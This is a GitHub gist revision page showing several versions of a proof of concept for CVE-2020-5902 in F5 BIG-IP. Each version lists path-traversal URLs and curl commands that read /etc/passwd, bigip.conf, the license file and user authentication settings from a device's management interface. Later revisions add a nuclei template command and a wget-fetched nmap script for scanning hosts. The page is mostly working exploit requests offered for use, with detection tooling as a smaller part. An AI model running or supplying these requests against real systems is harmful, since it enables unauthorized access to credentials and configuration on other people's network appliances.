Skip to content

Instantly share code, notes, and snippets.

@vxrv

vxrv/CVE-2020-5902.md

Forked from cihanmehmet/CVE-2020-5902.md
Created July 5, 2020 21:46
Show Gist options
  • Save vxrv/0de65a650f5d963e7196b340362832e2 to your computer and use it in GitHub Desktop.
Save vxrv/0de65a650f5d963e7196b340362832e2 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @cihanmehmet cihanmehmet revised this gist Jul 5, 2020. 1 changed file with 11 additions and 2 deletions.
    13 changes: 11 additions & 2 deletions CVE-2020-5902.md
    View file
    Original file line number Diff line number Diff line change
    @@ -1,4 +1,4 @@
    # 🔸 BIGIP CVE-2020-5902 Exploit POC
    # 🔸 BIGIP CVE-2020-5902 Exploit POC 👀
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ```powershell
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    @@ -16,7 +16,7 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    ```
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ## 🎯 Manuel POC
    ## 🎯 Manuel POC 🔥
    ```ruby
    curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    ```
    @@ -34,3 +34,12 @@ nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ![image](https://i.ibb.co/fNm0JGL/2.png)

    ## 🔎 NMAP Script for CVE-2020-5902
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ```powershell
    wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse
    ```
    ```console
    nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse
    ```
    ![image](https://i.ibb.co/S0df0bk/5.png)
  2. @cihanmehmet cihanmehmet revised this gist Jul 5, 2020. 1 changed file with 12 additions and 4 deletions.
    16 changes: 12 additions & 4 deletions CVE-2020-5902.md
    View file
    Original file line number Diff line number Diff line change
    @@ -1,12 +1,12 @@
    ## 🔸 BIGIP CVE-2020-5902 Exploit POC
    # 🔸 BIGIP CVE-2020-5902 Exploit POC
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ```powershell
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    ```
    ```console
    https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
    ```
    ```diff
    ```ruby
    https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
    ```
    ```bash
    @@ -15,14 +15,22 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/
    ```python
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    ```
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ## 🎯 Manuel POC
    ```ruby
    curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    ```
    ```bash
    curl -sk 'https://{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
    ```
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ## 📜 Nuclei Detect CVE-2020-5902
    https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml
    ```bash

    ```console
    nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt
    ```
    ![image](https://i.ibb.co/hHsWjrk/4.png)
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ![image](https://i.ibb.co/fNm0JGL/2.png)


  3. @cihanmehmet cihanmehmet revised this gist Jul 5, 2020. 1 changed file with 10 additions and 4 deletions.
    14 changes: 10 additions & 4 deletions CVE-2020-5902.md
    View file
    Original file line number Diff line number Diff line change
    @@ -1,4 +1,5 @@
    ## BIGIP CVE-2020-5902 Exploit POC
    ## 🔸 BIGIP CVE-2020-5902 Exploit POC
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ```powershell
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    ```
    @@ -14,9 +15,14 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/
    ```python
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    ```

    ## Nuclei Detect CVE-2020-5902
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ## 📜 Nuclei Detect CVE-2020-5902
    https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml
    ```bash
    nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt
    ```
    ```
    ![image](https://i.ibb.co/hHsWjrk/4.png)
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    ![image](https://i.ibb.co/fNm0JGL/2.png)


  4. @cihanmehmet cihanmehmet revised this gist Jul 5, 2020. 1 changed file with 2 additions and 0 deletions.
    2 changes: 2 additions & 0 deletions CVE-2020-5902.md
    View file
    Original file line number Diff line number Diff line change
    @@ -5,10 +5,12 @@ https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/
    ```console
    https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
    ```
    ```diff
    https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
    ```
    ```bash
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
    ```
    ```python
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    ```
  5. @cihanmehmet cihanmehmet created this gist Jul 5, 2020.
    20 changes: 20 additions & 0 deletions CVE-2020-5902.md
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,20 @@
    ## BIGIP CVE-2020-5902 Exploit POC
    ```powershell
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
    ```
    ```console
    https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
    ```
    https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
    ```
    ```bash
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
    ```python
    https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
    ```

    ## Nuclei Detect CVE-2020-5902
    https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/CVE-2020-5902.yaml
    ```bash
    nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -l https.txt
    ```